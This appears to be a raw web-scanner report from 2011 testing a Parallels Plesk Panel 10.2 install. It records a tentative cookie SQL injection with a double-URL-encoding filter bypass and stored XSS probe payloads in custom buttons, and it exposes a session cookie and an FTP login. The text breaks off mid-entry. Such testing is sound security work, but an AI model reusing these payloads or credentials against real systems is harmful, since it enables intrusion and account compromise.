no_frames=deleted;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:07 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:07 GMT
Connection: close
Content-Length: 16330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Unable to load object of type BsDomain with id=: Trying to create class BsDomain for not-existent client. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E [no_frames cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The no_frames cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the no_frames cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the no_frames cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted%2527;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:34:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:34:00 GMT
Connection: close
Content-Length: 111798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Fscript%253E' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"%0066f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27%253ca%253e3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"fdf080d9513e20f46babcaf7","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"47a92%2522%253baa99fdd1270?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 